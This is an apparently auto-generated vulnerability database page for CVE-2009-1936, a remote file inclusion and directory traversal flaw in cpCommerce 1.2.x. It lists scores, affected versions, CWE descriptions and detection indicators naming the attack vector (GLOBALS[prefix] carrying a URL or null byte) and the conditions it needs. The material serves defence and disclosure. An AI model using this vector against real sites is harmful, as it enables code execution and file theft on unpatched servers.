CVE-2009-1936
published 2009-06-05CVE-2009-1936: _functions.php in cpCommerce 1.2.x, possibly including 1.2.9, sends a redirect but does not exit when it is called directly, which allows remote attackers to…
PriorityP259critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
42.22%
98.5th percentile
_functions.php in cpCommerce 1.2.x, possibly including 1.2.9, sends a redirect but does not exit when it is called directly, which allows remote attackers to bypass a protection mechanism to conduct remote file inclusion and directory traversal attacks, execute arbitrary PHP code, or read arbitrary files via the GLOBALS[prefix] parameter, a different vector than CVE-2003-1500.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cpcommerce_project | cpcommerce | 1.2.0 – 1.2.9 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect GET requests to /_functions.php with a GLOBALS[prefix] parameter — direct access to this file is the attack vector; the file should never be called directly by legitimate users. ↗
- →Flag requests where GLOBALS[prefix] contains a URL scheme (e.g., 'http://') indicating Remote File Inclusion attempt. ↗
- →Flag requests where GLOBALS[prefix] contains a null byte (%00) indicating Local File Inclusion / directory traversal attempt with null-byte termination. ↗
- →The exploit checks response content for 'Failed opening' and 'No database selected' strings to confirm exploitation success — monitor outbound responses for these strings as a data-leakage indicator. ↗
- ·The exploit only works when PHP's register_globals is ON; with register_globals=off the GLOBALS[prefix] parameter cannot be injected, neutralising the attack. ↗
- ·Local File Inclusion (LFI) via null-byte termination additionally requires magic_quotes (mq) to be OFF; with magic_quotes=on the null byte is escaped and LFI is blocked. ↗
- ·Remote File Inclusion is blocked when PHP's 'URL file-access is disabled' (allow_url_include/allow_url_fopen=off); the exploit checks for this condition before proceeding. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
CWE
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
mitre_cwe
CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions.
In certain versions and configurations of PHP, this can allow an attacker to specify a URL to a remote location from which the product will obtain the code to execute. In other cases in association with path traversal, the attacker can specify a local file that may contain executable statements that can be parsed by PHP.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Common Consequences:
Scope:
CWE
Execution After Redirect (EAR)
mitre_cwe·CVSS 10.0
[CRITICAL] CWE-698 Execution After Redirect (EAR)
CWE-698: Execution After Redirect (EAR)
The web application sends a redirect to another location, but instead of exiting, it executes additional code.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Other, Confidentiality, Integrity, Availability. Impact: Alter Execution Logic, Execute Unauthorized Code or Commands. This weakness could affect the control flow of the application and allow execution of untrusted code.
Detection Methods:
Black Box: This issue might not be detected if testing is performed using a web browser, because the browser might obey the redirect and move the user to a different page before the application has produced outputs that indicate something is amiss.
Examples:
This code queries a server and displays its status when a request comes
CWE
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
mitre_cwe
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
Many file operations are intended to take place within a restricted directory. By using special elements such as ".." and "/" separators, attackers can escape outside of the restricted location to access files or directories that are elsewhere on the system. One of the most common special elements is the "../" sequence, which in most modern operating systems is inte
2009-06-05
Published